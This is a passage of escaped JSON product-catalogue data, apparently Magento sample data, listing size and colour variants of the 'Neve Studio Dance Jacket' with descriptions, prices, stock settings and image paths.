ge_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1305\":{\"sku\":\"WJ11-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket-S-Black\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"neve-studio-dance-jacket-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"1306\":{\"sku\":\"WJ11-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket-S-Blue\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"neve-studio-dance-jacket-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj11-blue_alt1.jpg,\\/w\\/j\\/wj11-blue_back.jpg\",\"image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj11-blue_alt1.jpg,\\/w\\/j\\/wj11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1307\":{\"sku\":\"WJ11-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket-S-Orange\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"neve-studio-dance-jacket-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1308\":{\"sku\":\"WJ11-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket-M-Black\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"neve-studio-dance-jacket-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"1309\":{\"sku\":\"WJ11-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket-M-Blue\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"neve-studio-dance-jacket-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj11-blue_alt1.jpg,\\/w\\/j\\/wj11-blue_back.jpg\",\"image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj11-blue_alt1.jpg,\\/w\\/j\\/wj11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1310\":{\"sku\":\"WJ11-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket-M-Orange\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"neve-studio-dance-jacket-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1311\":{\"sku\":\"WJ11-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket-L-Black\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"neve-studio-dance-jacket-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"1312\":{\"sku\":\"WJ11-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket-L-Blue\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"neve-studio-dance-jacket-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj11-blue_alt1.jpg,\\/w\\/j\\/wj11-blue_back.jpg\",\"image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj11-blue_alt1.jpg,\\/w\\/j\\/wj11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1313\":{\"sku\":\"WJ11-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket-L-Orange\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 